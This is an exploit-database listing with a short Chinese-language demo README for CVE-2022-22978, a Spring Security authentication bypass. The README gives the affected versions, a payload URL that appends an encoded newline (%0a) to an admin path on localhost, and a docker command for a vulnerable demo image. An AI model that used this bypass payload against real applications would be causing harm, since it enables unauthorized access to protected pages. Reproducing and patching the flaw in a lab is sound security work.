Exploit for Incorrect Authorization in Vmware Spring Security CVE-2022-22978

Name: Exploit for Incorrect Authorization in Vmware Spring Security CVE-2022-22978
Rating: 5 (362 reviews)

2022-05-31 | CVSS 7.5

## https://sploitus.com/exploit?id=96C34A34-563E-5A78-8547-79EC2646169D
### CVE-2022-22978 Spring-Security bypass Demo  
>在Spring Security中使用RegexRequestMatcher且规则中包含带点号的正则表达式时，攻击者可以通过构造恶意数据包绕过身份认证  
### 影响范围  
>Spring Security 5.5.x < 5.5.7  
Spring Security 5.6.x < 5.6.4
### 复现
![img.png](img.png)
![img_1.png](img_1.png)
### Paylaod
>http://localhost:8080/admin/index%0a
### Docker
> docker pull s0cke3t/cve-2022-22978:latest